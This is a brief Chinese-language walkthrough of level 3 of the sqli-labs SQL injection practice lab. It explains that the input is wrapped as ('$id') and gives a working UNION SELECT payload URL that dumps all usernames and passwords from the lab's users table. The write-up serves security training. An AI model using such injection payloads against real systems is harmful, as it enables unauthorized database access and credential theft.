【less-3】sqli-labs靶场第三关

解法

与Less-2类似，直接看这篇文章：【less-2】sqli-labs靶场第二关

不同的是，根据错误回显知道，其拼接方式为id=('$id')

故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1')

采用如下语句获取所有用户名和密码

https://sqli.wmcoder.site/sqli-labs/Less-3/?id=1') and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+